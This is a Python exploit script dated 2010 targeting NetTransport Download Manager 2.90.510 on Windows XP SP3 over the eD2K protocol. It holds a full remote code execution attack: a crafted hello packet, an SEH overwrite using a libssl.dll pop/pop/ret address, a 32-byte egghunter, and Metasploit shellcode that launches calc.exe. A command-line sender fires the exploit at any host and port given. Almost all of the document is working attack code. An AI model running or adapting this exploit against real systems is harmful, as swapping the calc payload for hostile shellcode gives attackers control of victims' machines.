NetTransport Download Manager version:2.90.510 0day :

Date : 2010-01-02 Author : Lincoln
#!/usr/bin/python

#########################
#NetTransport Download Manager version:2.90.510 0day
#Discovered by Lincoln
#Tested on Windows XP SP3
#
#eMule file sharing protocol
#SEH overwrite; only ~60 bytes of controlled data remain after the pop/pop/ret
#address, so a 32-byte egghunter is placed there and the real shellcode (calc.exe),
#tagged with the egg "c00lc00l", sits further down the same buffer
#
#root@BT4VM:~# ./netxfer.py 192.168.1.8 31491
#########################

import socket,sys

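# ---------------------------------------------------------------------------
# Payload building blocks.
#
# Every byte string below is a *literal*: the "\x.." escapes must survive
# copy/paste.  A copy of this file with the backslashes stripped sends the
# ASCII text "xfcxe8..." instead of machine code and the target never crashes.
# All offsets/addresses are specific to NetTransport 2.90.510 + its bundled
# libssl.dll on the author's Windows XP SP3 box (see header); re-derive them
# in a debugger before pointing this at any other build.
# ---------------------------------------------------------------------------

# * windows/exec - 200 bytes
# * http://www.metasploit.com
# * EXITFUNC=thread, CMD=calc.exe
# Proof-of-execution payload only: the trailing "calc.exe\0" is the command
# string the stub hands to WinExec.
SHELLCODE = (
    b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
    b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
    b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
    b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
    b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
    b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
    b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
    b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
    b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
    b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
    b"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
    b"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
    b"\x2e\x65\x78\x65\x00"
)

# 48-byte eD2K packet header that reaches the vulnerable parser (the author's
# "magic packet").  Read as an eDonkey hello it is: 0xe3 protocol marker,
# little-endian length 0x3d, opcode 0x01, a 16-byte user hash, 4-byte client
# id, 2-byte port, tag count 4, a string tag carrying the client name "test",
# and the start of an integer tag whose value runs straight into the filler
# appended below.  The declared length is far smaller than what is sent.
# NOTE(review): that field decoding is inferred from the bytes, not from the
# vendor's parser; only the packet as a whole is known to trigger the bug.
HELLO_PACKET = (
    b"\xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24"
    b"\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00"
    b"\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00"
)

# Skape-style 32-byte egghunter.  It page-aligns EDX (or dx,0xfff / inc edx),
# probes each page through "int 0x2e" with syscall 2 (push 2 / pop eax /
# int 0x2e) so an unmapped page yields an error code instead of a crash
# (cmp al,5 -> access violation), then compares memory against the 4-byte
# egg loaded by "mov eax, imm32" (\xb8 + EGG).  Control transfers to the
# byte after two back-to-back copies of the egg, hence EGG * 2 in front of
# the shellcode.  Syscall 2 is NtAccessCheckAndAuditAlarm on the author's
# XP target; the number differs on other Windows releases.
EGG = b"c00l"
EGGHUNTER_HEAD = (
    b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
)
EGGHUNTER_TAIL = b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

# SEH record overwrite.
#   119 filler bytes reach the SEH record;
#   nSEH  = "\xeb\x06" (jmp short +6) + 2 padding nops -> lands just past
#           the 4-byte handler address, on the nop sled before the hunter;
#   SEH   = 0x10002a57, a pop/pop/ret inside libssl.dll (little-endian).
SEH_OFFSET = 119
NSEH = b"\xeb\x06\x90\x90"
PPR_LIBSSL = b"\x57\x2a\x00\x10"  # 0x10002a57 pop/pop/ret, libssl.dll


def build_payload(shellcode=SHELLCODE, egg=EGG):
    """Return the complete packet: hello header, SEH overwrite, egghunter, egg+shellcode.

    shellcode: raw bytes the egghunter jumps to once found (default:
        Metasploit windows/exec calc.exe, 200 bytes).
    egg: 4-byte tag; it is patched into the hunter's "mov eax, imm32" and
        written twice immediately before the shellcode.
    Raises ValueError if egg is not exactly 4 bytes.
    """
    egg = bytes(egg)
    if len(egg) != 4:
        raise ValueError("egg tag must be exactly 4 bytes, got %d" % len(egg))
    egghunter = EGGHUNTER_HEAD + egg + EGGHUNTER_TAIL
    parts = [
        HELLO_PACKET,
        b"\x41" * SEH_OFFSET,
        NSEH,
        PPR_LIBSSL,
        b"\x90" * 10,          # landing pad for the jmp short +6
        egghunter,
        b"\x90" * 50,
        egg * 2,               # the hunter looks for the egg twice in a row
        b"\x90" * 20,
        bytes(shellcode),
        b"\x90" * 2000,        # slack so the shellcode sits well inside the mapped copy
    ]
    return b"".join(parts)


def send_payload(host, port, payload, timeout=None):
    """Open a TCP connection to host:port, send payload in full, then close.

    timeout: optional socket timeout in seconds; None blocks indefinitely,
        matching the original behaviour.
    Raises socket.error (OSError on Python 3) if the connection fails.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        if timeout is not None:
            s.settimeout(timeout)
        s.connect((host, port))
        # sendall() loops until every byte is written; a plain send() may
        # hand over only part of the ~2.5 KB buffer and silently truncate
        # the payload before the shellcode.
        s.sendall(payload)
    finally:
        s.close()


def main(argv):
    """Command-line entry point: netxfer.py <host> <eD2K port>.

    Returns a process exit status (0 on success, 2 on usage error).
    """
    if len(argv) != 3:
        sys.stderr.write("usage: %s <host> <eD2K port>\n" % argv[0])
        return 2
    host = argv[1]
    try:
        port = int(argv[2])  # eD2K port
    except ValueError:
        sys.stderr.write("port must be an integer, got %r\n" % (argv[2],))
        return 2
    send_payload(host, port, build_payload())
    print("\nExploit Sent!! Give the egghunter a few seconds to find the shellcode\n")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))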
